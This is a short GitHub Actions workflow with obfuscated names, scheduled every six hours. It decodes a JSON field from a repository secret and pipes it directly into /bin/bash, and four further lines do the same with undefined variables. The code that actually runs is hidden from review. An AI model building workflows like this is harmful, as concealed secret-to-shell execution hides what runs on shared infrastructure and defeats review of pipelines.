name: wutianqy
on:
  workflow_dispatch:
  schedule:
    - cron: '12 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wutianqy
        env:
          xime1665: ${{ secrets.xime1665 }}
        run: |
          echo $xime1665 | jq -r .abnom802 | /bin/bash
          echo $g720 | jq -r .rekd97078 | /bin/bash
          echo $n60 | jq -r .u4134 | /bin/bash
          echo $twgw29 | jq -r .ig0037 | /bin/bash
          echo $gj42 | jq -r .ton0 | /bin/bash

